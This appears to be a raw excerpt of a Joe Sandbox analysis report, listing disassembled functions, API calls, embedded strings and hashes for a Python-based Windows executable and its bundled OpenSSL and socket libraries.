                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A909
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A92E
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C34
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EAA
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EBB
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675ECC
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                                                                  • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                  • Instruction ID: 7c87c2dfff1801238b98d4aec5a2674972c44497560309c1737eb14a2b8fdfe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D1D422A1824286E722FF21DC421B9A363FFA47A4FC48976DA0D47695DF3CE445CF60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                  • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction ID: efd8a26337d1ab9ddb835e402724fb6bf05ce0f95ab9478cfb1275ebdcbd09d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F319336608B8186DB21DF25EC442AEB3A5FB98768F900535EA9D43B99DF3CC159CB10
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                  • API String ID: 0-1194634662
                                                                                                                                                                                                                                  • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                  • Instruction ID: 06f5639a19cef5d93a92c05df5a6b3a05ed96a9d56caa249f78da0e6503d2293
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D19DE2F0A68291EB13DB35D8517A96BA2FB85F84F545032EE4C8BB96CE3DD541C310
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: 00007E3440ErrorLast
• String ID: NOO$surrogatepass$unsupported address family
• API String ID: 725305683-472101058
• Opcode ID: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
• Instruction ID: 4f689844c807fb8bf6625e2e64ab29f714ffb9c8c24333f559dbeb54ab64c76f
• Opcode Fuzzy Hash: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
• Instruction Fuzzy Hash: 4E81A3A2E0AA52C1EA568B31E4C427D63A8AF45B94F044175FE0D437A5EF3DE492C360
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction ID: 4a845607282e17f4a483a487e092a201656256254044ab6ab78e4d0b38d8c084
• Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
• Instruction Fuzzy Hash: EBB1E622B1868241EE62EB219C011B9E362FB64BF4F945533D95D07B99EF3CE445CB10
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
• API String ID: 3568877910-3130753023
• Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
• Instruction ID: 74ab04e0d0678676a8caa618e5aba0365c0e2541f49eb0f6b292baf1d60fc814
• Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
• Instruction Fuzzy Hash: 1312D2E2F0AA9241EB229B71D4813BDAB92EF85F84F054032DE5D4BB85DE3DE5918700
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
• Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
Similarity
• API ID: 00007A6091
• String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context$Python
• API String ID: 1518032178-1888807747
• Opcode ID: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
• Instruction ID: 44471b4f74cf97a8fb2e3af1e8347c7c5f967cf031379eb00874c7a827f51366
• Opcode Fuzzy Hash: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
• Instruction Fuzzy Hash: 98A162F5A0A64282EA629F3AEC545B97372FFA5F80B046435CE4E83B50DF3DE4459B40
APIs
• _get_daylight.LIBCMT ref: 00007FF72C675EAA
  • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
• _get_daylight.LIBCMT ref: 00007FF72C675EBB
  • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
• _get_daylight.LIBCMT ref: 00007FF72C675ECC
  • Part of subcall function 00007FF72C6755C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755DC
  • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
  • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction ID: 807c0db034e7fbf72cd21f584035cc2bff27495446651293bd15c873eb4c4583
• Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
• Instruction Fuzzy Hash: 4551B132A0864286E711FF21DD821A9E362FF687A4FC44576EA0D43696DF3CE444CF60
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: listen
• String ID: |i:listen
• API String ID: 3257165821-1087349693
• Opcode ID: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
• Instruction ID: 4bfc29647a23036c5a6ddd68133d32b037b08b3381443cdd851aa587941936bf
• Opcode Fuzzy Hash: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
• Instruction Fuzzy Hash: 1F015EA1A19A41C2F7068F72E5C002EA369BF84B80F244071EE5E43B24EF3DE4668710
APIs
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655840
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655852
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655889
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65589B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558B4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558C6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558DF
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558F1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65590D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65591F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65593B
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65594D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655969
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65597B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655997
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559C5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                  • API String ID: 199729137-653951865
                                                                                                                                                                                                                                  • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction ID: eda8e9cb84964693718dd253f66033653bfa142b70d2fc38ce5af5868362422b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B22B164A09F07A1FA47BB55AC1A5B4A3A3FF647B1BE41835C51E02260FF3CA54D8F24
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                  • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                  • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction ID: b00a13361c43f882c3d9dc7e2ff6d330094b8b229ca819b7d7d68bea95002607
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E02B324A1DB0B91EA17BB15BC19574A3A3FF647B4BE40831C52E022A4EF3CB14D8A34
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: htons
                                                                                                                                                                                                                                  • String ID: %s(): AF_HYPERV address must be tuple, not %.500s$%s(): AF_HYPERV address service_id is not a valid UUID string$%s(): AF_HYPERV address vm_id is not a valid UUID string$%s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): unsupported AF_HYPERV protocol: %d$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])$UU;AF_HYPERV address must be a str tuple (vm_id, service_id)
                                                                                                                                                                                                                                  • API String ID: 4207154920-3631354148
                                                                                                                                                                                                                                  • Opcode ID: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
                                                                                                                                                                                                                                  • Instruction ID: ca4d1336d21a981c88a550ab27a94b77afebb0022e65bef825ba14417b537852
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EC109B1A0AB42C5EB128F75D8C01BC27A8BB48B84F544176EE4E43665DF3DE466C361
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFreeInfo$getaddrinfoinet_pton
